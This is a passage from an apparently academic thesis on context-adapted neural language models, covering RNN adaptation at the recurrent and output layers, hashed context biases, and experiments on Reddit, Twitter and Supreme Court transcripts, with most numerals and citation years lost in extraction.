the class language model is an extension of the standard n-gram model that operates on a set of word equivalence classes (brown et al., ). for a trigram, the probabilities are factored as $p(w_i \mid w_{i-2}, w_{i-1}) = p(w_i \mid c_i)\, p(c_i \mid c_{i-2}, c_{i-1})$. the use of classes reduces the effective size of the vocabulary when estimating $p(c_i \mid c_{i-2}, c_{i-1})$, thereby improving the reliability of those estimates and possibly allowing for use of a higher n-gram order. this is the advantage of the class language model formulation. however, the gain in reliability is associated with a loss of detail that can lead to mixed results.
the difficulty, for several decades, in finding a practical improvement over n-gram language models, despite their obvious weaknesses, was described as being a "source of considerable irritation" to researchers in the field (jelinek, ). a decade later, rosenfeld ( ) calls it ironic that "the most popular language models (n-grams) take no advantage of the fact that what's being modeled is language." and yet, even now with many alternatives to choose from, n-gram models continue to be heavily used. their strengths are that they make few assumptions other than the markov property, training the models is as fast as counting n-grams, and they use a vast number of parameters to memorize idiomatic and exceptional expressions.

. . vocabulary & input representation

an important design choice in language modeling is to define the vocabulary. typically, the vocabulary is set by taking the set of all words that appear at least k times in the training corpus for some small k. over time, as more powerful computers and bigger text corpora became available, the typical vocabulary size used in applications has likewise increased. figure .  shows the change in vocabulary size for large vocabulary continuous speech recognition systems over time, with a doubling in vocabulary size approximately every four years. similar increases are observed for other applications.

figure . : vocabulary size in large vocabulary continuous speech recognition systems over time.

exploding vocabulary sizes lead to exponential growth in model size and exponential increases in the time required for speech decoding. this trend is obviously not sustainable. dealing with the exponential growth is a challenge but also an opportunity for considerable amounts of innovation. research is proceeding into neural systems that can decode audio directly into text one character at a time (graves and jaitly, ; chan et al., ; bahdanau et al., ; maas et al., ).
the language model can be a character n-gram model trained separately or an lstm that is part of the larger neural network and trained end-to-end. when training end-to-end, the objective is to minimize the error rate instead of aiming to minimize perplexity. machine translation is also moving away from using word-based language models (lee et al., ; chung et al., ). google's machine translation system uses a small vocabulary of around , tokens that are a mix of words and subwords (wu et al., ). character-based models are far from a new concept. subword models have found use before, especially when working with highly inflected or low-resource languages (tucker et al., ; creutz et al., ; saraçlar et al., ); however, there has been a recent surge of interest in character- and subword-based models. this thesis makes a point of testing on both word- and character-level models so as to have maximum impact on future applications.

. . evaluation & metrics

language model evaluation is often done on a held-out test set using perplexity as a metric:

$$\text{perplexity} = \exp\Big(-\frac{1}{N} \sum_{i=1}^{N} \log p(w_i \mid w_{1:i-1})\Big).$$

perplexity was always recognized as a "crude" metric (jelinek, ) but is still widely used because it offers a quick and easy task-independent way of evaluating a language model. perplexity is not the only factor that matters when comparing models, however. models can be interesting for other reasons such as speed (brants et al., ). in some cases, the models are evaluated using downstream metrics like word error rate in speech recognition or bleu score in machine translation (kirchhoff and yang, ) instead of using perplexity. for text generation, human evaluations can be high quality but are costly to perform. perplexity will be the main evaluation metric used in this thesis due to the desire to be task-independent and the need to control costs, but some experiments with other metrics are included.
recently, some language modeling papers have used "dynamic evaluation", whereby the model is allowed to continue to train on the test data after making predictions for each segment (krause et al., ). this is a form of online updating and it helps to adapt to shifts between the training and the test data. dynamic evaluation makes less sense for certain applications such as speech recognition because it can reinforce errors in the transcription. language models can be fairly compared without the use of dynamic evaluation. thus, we do not make use of it in this thesis, except that we do use a form of online updating for one of our experiments that will be introduced in chapter , where the application makes sense.

. neural language modeling

continuous-space language models such as the neural probabilistic language model (bengio et al., a) obtain an advantage over n-gram models because they share information between n-grams by projecting to a low-dimensional continuous space. recurrent neural network (rnn) language models (mikolov et al., ) extend that advantage by permitting the incorporation of information from arbitrarily long word histories. the rnn language model in its basic form has three layers: an input layer, a recurrent layer, and an output layer. the input layer learns a word embedding matrix $E \in \mathbb{R}^{p \times |V|}$ that consists of a p-dimensional vector for each word in the vocabulary $V$. if the input $w_1, w_2, \ldots, w_N$ is represented as one-hot encoded vectors, then multiplying by $E$ gives the sequence of word embeddings $e_{w_1}, e_{w_2}, \ldots, e_{w_N}$.
the recurrent layer uses a weight matrix $W \in \mathbb{R}^{q \times (p+q)}$ and a bias vector $b_1 \in \mathbb{R}^q$ to transform the word embedding for the current step $e_{w_t}$ and its own output from the previous step $h_{t-1}$ into a hidden state vector $h_t$ that summarizes the sequence up to that point. the formula is given below, where $\sigma$ is the activation function, typically the hyperbolic tangent or a rectified linear unit (relu):

$$h_t = \sigma(W[e_{w_t}, h_{t-1}] + b_1).$$

the output layer uses the hidden state vector $h_t$ to estimate a probability distribution $y_t$ over the vocabulary for $w_{t+1}$:

$$y_t = \mathrm{softmax}(E^\top h_t + b_2).$$

the bias vector $b_2 \in \mathbb{R}^{|V|}$ acts as a prior on the unigram distribution and is a crucial part of the output layer. if the word embedding size p is not the same as the recurrent layer dimensionality q, then a linear projection can be inserted and the word embedding matrix $E$ from the input layer can be reused in the output layer to save on parameters and increase generalizability (press and wolf, ; inan et al., ). in this case, the equation for the output layer would be $y_t = \mathrm{softmax}(E^\top P h_t + b_2)$, with $P$ the projection matrix. the parameters of the model, $E$, $W$, $b_1$, and $b_2$, can all be learned jointly via backpropagation through time towards the objective of maximizing the likelihood of the data.
one limitation of neural language models, as originally proposed, is that the training time scales poorly with the size of the vocabulary. a variety of techniques were developed as workarounds. neural models were trained to predict only the words from a subset of the vocabulary known as a shortlist (schwenk, ), and the predictions from the neural model were interpolated with an n-gram model that could handle a full-sized vocabulary. shortly thereafter, hierarchical neural models were developed. these train faster with only a small decrease in perplexity (morin and bengio, ). techniques such as importance sampling (bengio et al., b) and noise contrastive estimation (mnih and kavukcuoglu, ) make it possible to quickly train full size vocabulary models without a hierarchy. the method used for training large vocabulary models in this thesis is the sampled softmax from jean et al. ( ). the sampled softmax constrains the vocabulary to a small random subset when computing the loss for each sequence, avoiding the need to backpropagate to the full vocabulary for every weight update. for a thorough review of methods for training large vocabulary neural language models, see chen et al. ( ).
the basic rnn has a flaw known as the vanishing/exploding gradient problem that prevents it from learning to use information from far back in the history (pascanu et al., ). in practice, this is mitigated by using alternate architectures such as long short-term memory (lstm) or the gated recurrent unit (gru) (sundermeyer et al., ). these architectures use gating mechanisms to control the flow of information and importantly they permit the preservation of information from the hidden state over time. our experiments make extensive use of these rnn variants. other techniques have been developed to further increase the stability of the rnn. in some of our experiments, we make use of layer normalization, which involves normalizing the first and second moments of the $W[e_{w_t}, h_{t-1}] + b_1$ term in the recurrent layer equation (ba et al., ).
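as a concrete illustration of the three-layer rnn language model just described, here is a minimal numpy sketch (all sizes, the toy word ids, and the random parameters are illustrative only, not taken from the thesis); it runs the recurrent and output layer equations over a short sequence and reports the resulting perplexity.

```python
# Basic RNN language model forward pass: embedding lookup, tanh recurrent
# layer, tied-embedding softmax output, and perplexity of a toy sequence.
import numpy as np

rng = np.random.default_rng(0)
V, p, q = 10, 8, 16                          # vocabulary, embedding, hidden sizes
E = rng.normal(scale=0.1, size=(p, V))       # word embedding matrix
W = rng.normal(scale=0.1, size=(q, p + q))   # recurrent weights
b1 = np.zeros(q)                             # recurrent bias
P = rng.normal(scale=0.1, size=(p, q))       # projection so E can be reused at output
b2 = np.zeros(V)                             # output (unigram prior) bias

def softmax(z):
    e = np.exp(z - z.max())
    return e / e.sum()

def step(w_id, h_prev):
    """One time step: h_t = tanh(W [e_{w_t}, h_{t-1}] + b1), y_t over the vocab."""
    x = np.concatenate([E[:, w_id], h_prev])
    h = np.tanh(W @ x + b1)
    y = softmax(E.T @ (P @ h) + b2)
    return h, y

sequence = [3, 7, 2, 5]                      # toy word ids; predict each next word
h, log_probs = np.zeros(q), []
for w_in, w_next in zip(sequence[:-1], sequence[1:]):
    h, y = step(w_in, h)
    log_probs.append(np.log(y[w_next]))

print(np.exp(-np.mean(log_probs)))           # perplexity; near V for random weights
```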
in the early s it was noted that n-gram language models benefit from boosting the probability of words observed in previous utterances or in earlier parts of a document because word usage is "bursty" (jelinek et al., ). once a word is observed in a given document, the probability of seeing it again is greatly increased. models that boost the probability of recently seen words are called cache language models (kuhn and de mori, ). these techniques have been extended to rnn language models by allowing the model to look back at the previous hidden states from the same sentence or document (merity et al., b; grave et al., a). usually, state-of-the-art language modeling results are reported both with and without the inclusion of a cache, e.g. merity et al. ( a), because the gain from a cache is considered to be orthogonal to other modeling improvements. the experiments in this thesis are reported without the inclusion of a cache in order to focus on our contributions to adaptation.

. language model adaptation

there is a long history of adapting n-gram language models starting from early work on mixture modeling (demori and federico, ; bellegarda, ). since this thesis builds on neural models, the review of prior work will only cover these methods. the long-established mixture techniques also apply to neural network models (irie et al., ), but our focus is on techniques that are specific to neural network adaptation.
we are most interested in cases with explicit representations of context; however, one adaptation method, model fine-tuning, does not require the use of a context embedding. the language model is first trained on general background data and then learning is briefly continued on smaller in-domain data to "fine-tune" the weights (gangireddy et al., ; zhang et al., ). fine-tuning suffers from the possibility of catastrophic forgetting, where the model loses access to the information it learned from training on the background data (goodfellow et al., ). one way of dealing with catastrophic forgetting is to freeze portions of the model during fine-tuning. some approaches combine fine-tuning with the addition of a new linear transformation in between the hidden and output layers (deena et al., ), or occasionally a non-linear transformation is used instead (ma et al., ). this is motivated in part by similar approaches for adapting acoustic models in speech recognition (gemello et al., ).
adaptation of neural language models has two parts: representing context information and using the context representation to alter the model predictions. we discuss these next.

. . context representations

for neural language model adaptation, context information is typically represented as an embedding vector. neural networks have the advantage in that they are quite versatile in the types of inputs that they can accept. another advantage is that the network can learn the context representations as part of the end-to-end language modeling task. some of the types of context that could be or have been used are:
1. topic model vectors that summarize the topic of long documents (mikolov and zweig, ).
2. context is the title of a ted talk, represented as an embedding using either bag-of-words features or using an rnn or cnn (hoang et al., ).
3. context is a one-hot encoded vector indicating an amazon product identifier and another one-hot vector indicating the sentiment of a review of that product (tang et al., ).
the context information can be categorical, numeric, textual information, or a combination of these. it could even be composed of attributes that are predicted using a machine learning system based on other features.
the majority of experiments in this thesis use categorical context variables, but the methods all apply to other cases. we assume the availability of contextual information (metadata or other side information) that is represented as a set of context variables $f_{1:n} = f_1, f_2, \ldots, f_n$, from which we produce a k-dimensional representation in the form of an embedding, $c \in \mathbb{R}^k$. each of the context variables, $f_i$, represents some type of information or metadata about the sequence and can be either categorical or numerical.
we adopt the strategy from tang et al. ( ) of combining information from multiple context variables using a simple neural network. this strategy is well-suited for the types of context variables that we will see in our experiments, particularly high dimensional contexts such as hotel identity in a review or user identity in a query completion task. for each context variable $f_i$, we learn an associated embedding matrix $F_i$, $i = 1, \ldots, n$. if $n = 1$ then the embedding can directly be used as the context representation. otherwise, a single layer neural network is used to combine the embeddings from the individual variables:

$$c = \tanh\Big(\sum_i M_i F_i f_i + b\Big).$$

in some cases the tanh activation function is replaced with the relu function instead. $M_i$ and $b$ are parameters learned by the model. the context embedding, $c$, is used for adapting both the hidden and the output layer of the rnn.

. . adaptation mechanisms

mikolov and zweig ( ) were the first to propose a method for adapting rnn language models by augmenting both the recurrent layer and output layer equations with an extra term. the adaptation depends on having a summary of the context information contained in an embedding vector $c \in \mathbb{R}^k$. to adapt the recurrent layer, they concatenate the context embedding $c$ with the word embedding at every step of the input, which we show in the next chapter is equivalent to an additive context-dependent bias. we refer to this form of adaptation as the concatcell:

$$h_t = \sigma(W[e_{w_t}, h_{t-1}, c] + b_1).$$

to adapt the output layer, an adaptation term $Gc$ is added,

$$y_t = \mathrm{softmax}(E^\top h_t + Gc + b_2),$$

which has the effect of altering the softmax bias in a context dependent way. we refer to models that use this form of adaptation as the softmaxbias model. softmaxbias adaptation appears to be a reasonable approach in cases where the context concerns topic, since we know that the unigram distribution is often sufficient to capture topical information. as we will show later on, softmaxbias adaptation alone is not sufficient to get the best results. this is particularly obvious when dealing with character-level models, where the unigram distribution carries little information about topic or style.
in the special case where the context variable is discrete and of low cardinality, the bias vector can be adapted by directly learning independent bias vectors for each context, i.e. replacing the context embedding $c$ with a one-hot encoded vector. when the cardinality of the context variables is high, learning independent bias vectors carries a high memory cost. although it is not often framed in this way, the $Gc$ term acts as a low-rank approximation to the strategy of learning independent bias vectors. we will use both strategies in this thesis, as the situation warrants.
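the following is a minimal numpy sketch of these two baseline mechanisms, assuming two toy categorical context variables (all sizes, names, and random parameters are illustrative, not taken from the thesis): it builds the context embedding c with the single-layer combination network, runs one concatcell recurrent step, and produces a softmaxbias-adapted output distribution.

```python
# ConcatCell and SoftmaxBias adaptation with a learned context embedding.
import numpy as np

rng = np.random.default_rng(1)
V, p, q, k = 12, 8, 16, 6                    # vocab, word-embed, hidden, context sizes
n_ctx = [5, 3]                               # cardinalities of two context variables

E = rng.normal(scale=0.1, size=(p, V))
F = [rng.normal(scale=0.1, size=(k, n)) for n in n_ctx]   # per-variable embeddings
M = [rng.normal(scale=0.1, size=(k, k)) for _ in n_ctx]
b_c = np.zeros(k)

W = rng.normal(scale=0.1, size=(q, p + q + k))   # concatcell: context as extra input
b1 = np.zeros(q)
G = rng.normal(scale=0.1, size=(V, k))           # softmaxbias adaptation matrix
b2 = np.zeros(V)
Ep = rng.normal(scale=0.1, size=(V, q))          # output projection of hidden state

def softmax(z):
    e = np.exp(z - z.max())
    return e / e.sum()

def context_embedding(f_ids):
    """c = tanh(sum_i M_i F_i f_i + b) for categorical context variable values f_i."""
    return np.tanh(sum(M[i] @ F[i][:, f] for i, f in enumerate(f_ids)) + b_c)

def concatcell_step(w_id, h_prev, c):
    return np.tanh(W @ np.concatenate([E[:, w_id], h_prev, c]) + b1)

def softmaxbias_output(h, c):
    return softmax(Ep @ h + G @ c + b2)

c = context_embedding([2, 1])                # e.g. (product identity, sentiment level)
h = concatcell_step(3, np.zeros(q), c)
y = softmaxbias_output(h, c)
print(y.sum())                               # 1.0: a context-adapted next-word distribution
```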
these two adaptation strategies have been adopted for a variety of tasks, including personalization, adapting to television show genres (chen et al., ), adapting to long range dependencies in a document (ji et al., ), etc. see table .  for a listing of more prior work, showing which of these methods were employed. as shown in the table, a variety of contexts have been used. topic based adaptation is popular, but categorical variables are also used, like product identity or sentiment level. when doing personalization, the context can be an identifier for the person (li et al., ), or alternatively the information can be given as a bag-of-words representation of the person's prior utterances or writings (wen et al., ).

table . : approaches to rnn language model adaptation in prior work, indicating use of the concatcell (cc) or softmaxbias (sb) adaptation strategy.
topic rnn (dieng et al., ): topic model
context aware generation (tang et al., ): product identity and sentiment
generative text classification (yogatama et al., ): miscellaneous
controlling style in text generation (ficler and goldberg, ): movie review stylistic features
context dependent lm (mikolov and zweig, ): topic model (cc and sb)
language model personalization (wen et al., ): social media text (cc and sb)
multi-genre speech recognition (chen et al., ): topic model (cc and sb)
contextual lstm (ghosh et al., ): topic model
persona based conversation (li et al., ): personalized response generation
feature-based rnn lm adaptation (deena et al., ): multi-genre broadcast speech

few studies have tested the relative merits of adapting at the recurrent layer versus the output layer. ji et al. ( ) compares the two approaches, which they refer to as ccdclm and codclm. they find that both give similar perplexities. softmaxbias wins by % on one dataset and by less than % on the other. however, adapting the recurrent layer does better at an auxiliary sentence ordering task. the fact that differences between models can be more prominent in metrics other than perplexity is a theme that we will return to later on in the thesis. they do not test any models that adapt both the recurrent and output layers. hoang et al. ( ) also consider adapting at the hidden layer vs. at the softmax layer. they report a small advantage towards adapting the output layer, but the comparison is only made on a single dataset.
it should be noted that not all models fit cleanly into the above framework, although it is the dominant paradigm. the hoang et al. ( ) model differs from the softmaxbias approach because it uses an extra perceptron layer in the output. luan et al. ( ) use the recurrent layer bias approach plus an extra context-dependent linear projection in between the recurrent and the output layer. wen et al. ( ) uses a custom gating architecture to adapt to dialogue states.

chapter  exploring context-aware rnns

in this chapter, we show that the popular rnn hidden layer adaptation strategy described in the previous chapter corresponds to a static additive bias term. then, we study the impact of adapting rnns at the recurrent layer versus the output layer using different architectures and techniques. starting with the unadapted rnn that makes no use of context information, we consider two mechanisms each for adapting the recurrent layer and the output layer respectively.
one of the methods for adapting the recurrent layer is a novel multiplicative rescaling of the hidden state dimensions. using experiments on three datasets, we make some observations about what factors make a dataset more or less amenable to adaptation. these studies provided the groundwork that led to the proposal of the factorcell model.

. additive bias adaptation

as described in section . . , the standard approach to recurrent layer adaptation is to include (via concatenation) the context embedding as an additional input to the recurrent layer. when the context embedding is constant across the whole sequence, it is easy to show that this concatenation is equivalent to using a context-dependent bias at the recurrent layer:

$$h_t = \sigma(\hat{W}[e_{w_t}, h_{t-1}, c] + b_1) = \sigma(W[e_{w_t}, h_{t-1}] + Qc + b_1) = \sigma(W[e_{w_t}, h_{t-1}] + b_1'),$$

where $\hat{W} = [W\ Q]$ and $b_1' = Qc + b_1$ is the context-dependent bias, formed by adding a linear projection of the context embedding. thus, for this scenario where the context only changes sporadically, concatenating the context embedding with the input to the recurrent layer is the same as using a context-dependent bias vector. some people perform the concatenation explicitly despite its inefficiencies compared to directly learning the context-dependent bias because modern deep learning libraries do not always make it easy to alter the internal workings of the rnn or lstm. (the content of this chapter draws from our previously published work (jaech and ostendorf, ).)

. models

we consider two methods each for adapting the recurrent and output layers respectively. in total there are 16 possible models that can be constructed by enabling or disabling each of the four adaptations. all of the models with adaptation incorporate a context embedding c using the method described in section . . .

. . adapting the recurrent layer

we consider two methods for adapting the recurrent layer. the first is the concatcell described above. it can be implemented by simply concatenating the context vector $c$ with the word embedding $e_{w_t}$ at each timestep at the input to the recurrent layer, but the effect of this adaptation is to apply a linear additive shift to the recurrent layer bias.
to increase the adaptability of the hidden layer, we introduce a context-dependent multiplicative rescaling of the hidden layer weights. the method is inspired from ha et al. ( ), where a similar multiplicative scaling is used to dynamically adjust the parameters of a language model in response to the previous words in the sentence. using this row rescaling technique on top of the additive adaptation above, the equation becomes

$$h_t = \sigma\big(Cc \odot W[e_{w_t}, h_{t-1}] + Qc + b_1\big),$$

where $C \in \mathbb{R}^{q \times k}$ is a new model parameter and $\odot$ is the elementwise multiplication operator. the element-wise multiplication is a low-cost operation and can even be pre-calculated so that model evaluation can happen with no extra computation compared to a vanilla rnn.
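as a small illustration of the hidden-layer adaptations just described, here is a minimal numpy sketch of a single recurrent step that combines the additive (concatcell-equivalent) bias shift with the multiplicative row rescaling; all sizes and random parameters are illustrative, and, as noted above, the scale and shift can be precomputed once per context.

```python
# Context-dependent multiplicative rescaling plus additive bias adaptation:
# h_t = tanh((C c) * W [e_t, h_{t-1}] + Q c + b1)
import numpy as np

rng = np.random.default_rng(2)
V, p, q, k = 12, 8, 16, 6
E = rng.normal(scale=0.1, size=(p, V))
W = rng.normal(scale=0.1, size=(q, p + q))
Q = rng.normal(scale=0.1, size=(q, k))       # additive context projection (bias shift)
C = rng.normal(scale=0.1, size=(q, k))       # multiplicative rescaling parameters
b1 = np.zeros(q)

def rescaled_step(w_id, h_prev, c):
    scale = C @ c                            # one scale factor per hidden dimension;
    shift = Q @ c + b1                       # both depend only on the context, so they
    x = np.concatenate([E[:, w_id], h_prev]) # can be computed once and cached
    return np.tanh(scale * (W @ x) + shift)

c = rng.normal(size=k)                       # a context embedding from the context network
h = rescaled_step(3, np.zeros(q), c)
print(h.shape)                               # (16,)
```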
. . adapting the output layer

one way of adapting the output layer is to let each context have its own bias vector. this requires the use of a matrix of size $|V| \times |C|$, where $|V|$ is the size of the vocabulary and $|C|$ is the total number of possible contexts. this may be intractable when both $|V|$ and $|C|$ are large. mikolov and zweig ( ) use a low-rank factorization of the adaptation matrix, replacing the $|V| \times |C|$ matrix with the product of a matrix $G$ of size $|V| \times k$ and a context embedding $c$ of size k:

$$y_t = \mathrm{softmax}(E^\top h_t + Gc + b_2).$$

the total number of parameters is now a much more manageable $O(|V| + \sum_i |c_i|)$ instead of $O(\sum_i |V|\,|c_i|)$, where $|c_i|$ is the cardinality of the i-th context variable. the advantage of a low-rank adaptation is that it forces the model to share information between similar contexts. the disadvantage is that important differences between similar contexts can be lost. we employ feature hashing to reduce the memory requirements but retain some of the benefits of having an individual bias term for each context-word pair. the context-word pairs are hashed into buckets and individual bias terms are learned for each bucket.
the hashing technique relies on having direct access to the context variables $f_{1:n}$. representing context as a latent topic distribution precludes the use of this hashing adaptation. the choice of hashing function is motivated by what is easy and fast to perform inside the tensorflow computation graph framework. if $w$ is a word identifier (id) and $f_{1:n}$ are context variable id's, then the hash table index is computed as

$$h_i(w, f_i) = (wr + f_i r_i) \bmod L,$$

where $L$ is the size of the hash table and $r$ and the $r_i$'s are all fixed random integers. (the newer versions of tensorflow make it easier to do feature hashing than what we describe here.) the value of $L$ is usually set to a large prime number. the function $H : \mathbb{Z} \rightarrow \mathbb{R}$ maps hash indices to hash values and is implemented as a simple array. since $L$ is much smaller than the total number of inputs, there will be many hash collisions. hash collisions are known to negatively affect the perplexity (mikolov et al., ). to deal with this issue, we restrict the hash table to context-word pairs that are observed in the training data. a bloom filter data structure records which context-word pairs are eligible to have entries in the hash table. the design of this data structure trades off a compact representation of set membership against a small probability of false positives (bloom, ; talbot and brants, ; xu et al., ). a small amount of false positives is relatively harmless in this application, because they do not impair the ability of the bloom filter to eliminate almost all of the hash collisions. the function $\beta : \mathbb{Z} \rightarrow \{0, 1\}$ is used by the bloom filter to map hash indices to binary values:

$$B(w, f_i) = \prod_j \beta(h_{i,j}(w, f_i)).$$

the hash functions $h_{i,j}$ are defined in the same way as the $h_i$'s above except that they use distinct random integers and the size of the table, $L$, can be different. because $\beta$ is a binary function, the product $B(w, f_i)$ will always be zero or one. thus, any word-context pairs not found in the bloom filter will have their hash values set to zero. the final expression for the hashed adaptation term is given by

$$\mathrm{hash}(w, f_{1:n}) = \sum_{i=1}^{n} H(h_i(w, f_i))\, B(w, f_i),$$

$$y_t = \mathrm{softmax}(E^\top h_t + Gc + b_2 + \mathrm{hash}(w_t, f_{1:n})).$$
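the following is a minimal python sketch of this hashed bias with a bloom filter; the table sizes, the random constants, and the toy (word, context) pairs are illustrative, and the real implementation lives inside the tensorflow graph with bias values learned jointly with the rest of the model.

```python
# Hashed context-word bias with a bloom filter: random-integer hash functions
# index a learned table of bias values, and a bloom filter built from the
# (word, context) pairs seen in training zeroes out values for unseen pairs,
# eliminating almost all hash collisions.
import numpy as np

rng = np.random.default_rng(3)
L, L_BLOOM, N_BLOOM_HASHES = 10007, 20011, 2
r, r_i = 2654435761, 40503                       # fixed random integers for the hash
bloom_r = rng.integers(1, 2**31, size=(N_BLOOM_HASHES, 2))

hash_table = np.zeros(L)                         # learned bias values (trained jointly)
bloom = np.zeros(L_BLOOM, dtype=bool)

def h(word_id, ctx_id):
    return (word_id * r + ctx_id * r_i) % L

def bloom_indices(word_id, ctx_id):
    return [(word_id * a + ctx_id * b) % L_BLOOM for a, b in bloom_r]

def add_to_bloom(word_id, ctx_id):
    for idx in bloom_indices(word_id, ctx_id):
        bloom[idx] = True

def hashed_bias(word_id, ctx_id):
    """Bias contribution for one (word, context-variable) pair."""
    member = all(bloom[idx] for idx in bloom_indices(word_id, ctx_id))
    return hash_table[h(word_id, ctx_id)] if member else 0.0

# record the pairs observed in training, then look some up
for word_id, ctx_id in [(17, 4), (23, 4), (17, 9)]:
    add_to_bloom(word_id, ctx_id)
hash_table[h(17, 4)] = 0.8                       # stands in for a learned value
print(hashed_bias(17, 4))                        # 0.8, pair seen in training
print(hashed_bias(99, 4))                        # 0.0 (almost surely), unseen pair
```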
. data

the experiments make use of three corpora chosen to give a diverse perspective on adaptation in language modeling. summary information on the training set for each source (reddit, twitter, and scotus) is provided in table .  and each source is discussed individually below. the reddit and scotus data are tokenized and lower-cased using the standard nltk tokenizer (bird et al., ).

table . : number of sentences, vocabulary size and context variables for the three corpora.
reddit: , k sentences; vocabulary of , words; context: subreddit ( )
twitter: k sentences; vocabulary of characters; context: language ( )
scotus: k sentences; vocabulary of , words; context: case ( ), speaker ( ), role ( )

reddit. reddit is the world's largest online discussion forum and is comprised of thousands of active subcommunities dedicated to a wide variety of themes. our training data is million sentences ( million words) from reddit comments during the month of april . only the first sentence from each comment was used. the , word vocabulary is selected by taking all tokens that occur at least times in the training data. the remaining tokens are mapped to a special unk token, leaving us with an out of vocabulary rate of . %. the validation data and test data each contain one eighth the number of sentences as the training data. the context variable is the identity of the subreddit, i.e. community, that the comment came from. there are , subreddits with at least training sentences. the remaining ones are grouped together in an unk category. the largest subreddit occupies just . % of the data. by using a large number of subreddits, we highlight an advantage of model adaptation, which is to be able to use a single unified model instead of training thousands of separate models for each individual community. similarly, using context dependent bias vectors for this data instead of the hash adaptation would require learning million additional parameters.
twitter. the twitter training data has , tweets ( , words) each annotated with one of nine languages: english, german, italian, spanish, portuguese, basque, catalan, galician, and french. the corpus was collected by combining resources from published data for language identification tasks during the past few years. tweets labeled as unknown, ambiguous, or containing code-switching were not included. the data is unbalanced across languages, with more than % of the tweets being spanish and the smallest four languages (italian, german, basque, and galician) each representing less than . % of the total. there are unique character tokens in the vocabulary. graphemes that are surrogate-pairs in the utf- encoding, such as emoji, are split into multiple vocabulary tokens. no preprocessing or tokenization is performed on this data except that newlines were replaced with spaces for convenience. the validation and test data have , and , tweets respectively.
scotus. approximately , utterances ( million words) of training data spanning arguments from - . these are speech transcripts from arguments before the united states supreme court. utterances are labeled with the case being argued (n= , ), the speaker id (n= , ), and the speaker role (justice, advocate, or unidentified). these three context variables are defined in the same way as in hutchinson et al. ( ), where a small portion of this data was used in language modeling experiments. the vocabulary size is around , words. utterances longer than words ( th percentile) were split into smaller utterances. (occasionally, the advocates go on for hundreds of words without interruption; including these utterances would slow down the training.) the validation and test data were each one eighth the size of the training data.

. experiments

we used an lstm with coupled input and forget gates for a % reduction in computation time (greff et al., ). dropout was used as a regularizer on the inputs and outputs of the recurrent layer as described in zaremba et al. ( ). for the large vocabulary experiments, we used a sampled softmax loss to speed up training.
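as a rough illustration of the sampled-softmax idea (not the exact tensorflow implementation used in these experiments, which also corrects for the sampling proposal), the following sketch computes the loss over the true next word plus a small uniform sample of negative words instead of the full vocabulary; all sizes are illustrative.

```python
# Sampled softmax: approximate the full-vocabulary normalizer with the target
# word plus a random subset of negative words, so each update touches only a
# few hundred output rows instead of tens of thousands.
import numpy as np

rng = np.random.default_rng(4)
V, q, n_samples = 50000, 16, 256
Ep = rng.normal(scale=0.1, size=(V, q))          # output embeddings
b2 = np.zeros(V)

def sampled_softmax_loss(h, target):
    negatives = rng.choice(V, size=n_samples, replace=False)
    candidates = np.concatenate(([target], negatives[negatives != target]))
    logits = Ep[candidates] @ h + b2[candidates]
    log_norm = np.log(np.exp(logits - logits.max()).sum()) + logits.max()
    return -(logits[0] - log_norm)               # negative log-probability of the target

h = rng.normal(size=q)
print(sampled_softmax_loss(h, target=123))       # loss over ~257 words, not 50k
```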
a summary of the key hyperparameters for each class of experiments is given in table . . we conducted some preliminary experiments to tune the different hyperparameters for each dataset. then, we fixed the values of these hyperparameters and only varied the adaptation method in each experiment. the total parameter column in this table is based on the unadapted model. adapted models will have more parameters depending on the type of adaptation. when using hash adaptation of the output layer, the size of the bloom filter is million and the size of the hash table is million. the model is implemented using the tensorflow library. optimization is done using adam with a learning rate of . . each model trained in under three days using cpu threads.

table . : summary of key hyperparameters (batch size, word embedding size, lstm size, dropout, number of negative samples, and total parameters) for the reddit, scotus, and twitter experiments.

although the model is trained as a language model, it can be used as a generative text classifier. the classification rule is given by $\operatorname{argmax}_{i} \sum_j \log p(w_j \mid w_{1:j-1}, f_k = i)$, where $f_k$ is the unknown context variable. when there are multiple context variables, we treat all but one of them as known values and attempt to identify the unknown one. it is not necessary to compute the probabilities over the full vocabulary to do text classification. the sampled softmax criteria can be used to greatly speed up evaluation of the classifier provided that a) the same negative samples are reused for each class and b) the number of negative samples is increased to around % of the vocabulary.

. . reddit experiments

the size of the subreddit embeddings was set to . table .  gives the perplexities and average aucs for subreddit detection for different adapted models. the evaluation data contains , sentences. for comparison, an unadapted -gram kneser-ney model trained on the same data has a perplexity of . the models with the best perplexity do not use multiplicative adaptation of the hidden layer, but it is useful in the detection experiments.

table . : perplexities and classification average aucs for reddit models, for each combination of the four adaptation methods (multiplicative and additive hidden-layer adaptation; low-rank and hash output-layer adaptation).

we can inspect the context embeddings learned by the model to see if it is exploiting similarities between subreddits in the way that we expect. table .  lists the nearest neighbors by euclidean distance to three selected subreddits.

table . : nearest neighbors to selected subreddits in the context embedding space.
pittsburgh: atlanta, montana, madisonwi, baltimore
python: csharp, javascript, cpp_questions, cpp
nba: warriors, rockets, mavericks, nbaspurs

the nearest neighbors are intuitively reasonable. for example, the closest subreddits to pittsburgh are communities created for other big cities and states. the python subreddit is close to other programming language communities, and the nba subreddit is close to the communities for individual nba teams.
the number of subreddits is large enough that applying a generative classifier to the full set is impractical. we used a smaller subset of subreddits and, to avoid bias, picked the same ones used in another study (tran and ostendorf, ). this caused the classification task to turn into a detection one and therefore the decision rule is slightly different from what was described above.
the subreddit detection involves predicting the subreddit a given comment came from, with eight subreddits to choose from (askmen, askscience, askwomen, atheism, changemyview, fitness, politics, and worldnews) and nine distractors (books, chicago, nyc, seattle, explainlikeimfive, science, running, nfl, and todayilearned). to make a classification decision we evaluate the perplexity of each comment under the assumption that it belongs to each of the eight subreddits. we use z-score normalization across the eight perplexities to create a score for each class. the predictions are evaluated by averaging the auc of the eight individual roc curves. the best model for the classification task uses all four types of adaptation. the multiplicative adaptation of the hidden layer is clearly useful for classification even though it does not help with perplexity.
the perplexities for selected large subreddits are listed in table . . it can be seen that the relative gain from adaptation is largest when the topic of the subreddit is more narrowly focused. the biggest gains were achieved for subreddits dedicated to specific sports, tv shows, or video games, whereas the gains were smallest for subreddits like videos or funny, for which the content tends to be more diverse. the knowledge that a sentence came from a pro-wrestling subreddit effectively provides more information about the text than the analogous piece of knowledge for the pics or videos subreddit. this would seem to indicate that further gains could be possible if additional contextual information could be provided. an alternative explanation, that subreddits with fewer sentences in the training data receive more benefit from adaptation, is not supported by the data.

table . : comparison of perplexities per subreddit.
flashtv: a popular tv show
shield: a tv show
globaloffensive: a pc video game
nba: national basketball association
squaredcircle: professional wrestling
fitness: exercise and fitness
hockey: professional hockey
